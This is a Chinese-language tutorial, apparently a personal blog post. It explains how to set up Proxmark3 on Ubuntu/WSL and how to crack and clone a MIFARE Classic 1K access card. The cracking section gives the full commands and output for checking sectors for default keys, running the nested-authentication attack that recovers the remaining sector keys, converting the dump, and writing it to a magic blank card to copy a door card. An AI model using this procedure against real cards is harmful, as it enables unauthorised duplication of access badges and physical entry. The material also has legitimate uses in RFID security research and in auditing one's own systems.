PM3环境搭建
windows的环境搭建比较麻烦,有虚拟机的话可以用虚拟机,强烈安利WSL(Windows subsystem for Linux),非常友好。
接下来介绍基于Ubuntu的环境搭建,参考PM3Wiki
首先检查更新
sudo apt-get update && sudo apt-get upgrade
然后安装所依赖的工具
sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd
拉源码
git clone https://github.com/proxmark/proxmark3.git
当然可以使用第三方的固件,如Iceman
git clone https://github.com/RfidResearchGroup/proxmark3.git
然后获取最新的内容,进行权限配置
cd proxmark3
git pull
sudo cp -rf driver/77-mm-usb-device-blacklist.rules /etc/udev/rules.d/77-mm-usb-device-blacklist.rules
sudo udevadm control --reload-rules
sudo adduser $USER dialout
编译源文件
make clean && make all
然后就可以插入PM3了,由于我用的是WSL,Ubuntu与主机共用串口,所以需要先确定端口号,为COM7,就可以直接连接了,
sudo ./proxmark3 /dev/ttyS7
M1卡破解
首先进行卡片类型识别,先查看没有卡的时候天线信号
proxmark3> hw tune
Measuring antenna characteristics, please wait.........
# LF antenna: 24.61 V @ 125.00 kHz
# LF antenna: 29.84 V @ 134.00 kHz
# LF optimal: 31.21 V @ 130.43 kHz
# HF antenna: 24.53 V @ 13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
将卡放在高频区,再进行天线信号检测
Measuring antenna characteristics, please wait.........
# LF antenna: 25.16 V @ 125.00 kHz
# LF antenna: 30.94 V @ 134.00 kHz
# LF optimal: 32.31 V @ 130.43 kHz
# HF antenna: 19.60 V @ 13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
发现HF电压发生明显变化,则该卡为高频卡,同样也可用该方法识别低频卡,使用进一步的命令,识别该卡为M1卡
proxmark3> hf search
UID : 60 64 7d 26
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
查看扇区是否采用默认密码,
proxmark3> hf mf chk *1 ? t
--chk keys. sectors:16, block no: 0, key type:?, eml:y, dmp=n checktimeout=471 us
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9
To cancel this operation press the button on the proxmark...
--o
|---|----------------|----------------|
|sec|key A |key B |
|---|----------------|----------------|
|000| ffffffffffff | ffffffffffff |
|001| ? | ? |
|002| ffffffffffff | ffffffffffff |
|003| ? | ? |
|004| ffffffffffff | ffffffffffff |
|005| ffffffffffff | ffffffffffff |
|006| ffffffffffff | ffffffffffff |
|007| ffffffffffff | ffffffffffff |
|008| ffffffffffff | ffffffffffff |
|009| ffffffffffff | ffffffffffff |
|010| ffffffffffff | ffffffffffff |
|011| ffffffffffff | ffffffffffff |
|012| ffffffffffff | ffffffffffff |
|013| ffffffffffff | ffffffffffff |
|014| ffffffffffff | ffffffffffff |
|015| ffffffffffff | ffffffffffff |
|---|----------------|----------------|
28 keys(s) found have been transferred to the emulator memory
具体的命令使用说明,可以自行help
发现部分扇区采用默认密码。ffffffffffff
M1卡存在漏洞,可以通过已知扇区的key破解加密扇区的key
proxmark3> hf mf nested 1 0 A FFFFFFFFFFFF d
--nested. sectors:16, block no: 0, key type:A, eml:n, dmp=y checktimeout=471 us
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=1
Setting authentication timeout to 103us
Found valid key:01206f340100
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
Found valid key:112233445566
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
Found valid key:50f6a442e26d
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
Found valid key:e59925b18b43
-----------------------------------------------
Nested statistic:
Iterations count: 17
Time in nested: 8.851 (0.521 sec per key)
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| 112233445566 | 1 | 01206f340100 | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| 50f6a442e26d | 1 | e59925b18b43 | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| ffffffffffff | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...
已成功破解其他加密扇区的key,并且写到了dumpkeys.bin文件中,需要将该文件转化成PM3认识的格式才可进行门卡的复制
proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml
-----Finished
proxmark3>
然后将白卡放在高频区,把数据写到白卡里
proxmark3> hf mf cload 60647D26
Chinese magic backdoor commands (GEN 1a) detected
Loading magic mifare 1K
Loaded from file: 60647D26.eml
大功告成!!!
参考链接:
https://github.com/Proxmark/proxmark3/wiki/Ubuntu-Linux
https://www.cnblogs.com/k1two2/p/5706516.html
https://lzy-wi.github.io/2018/07/26/proxmark3/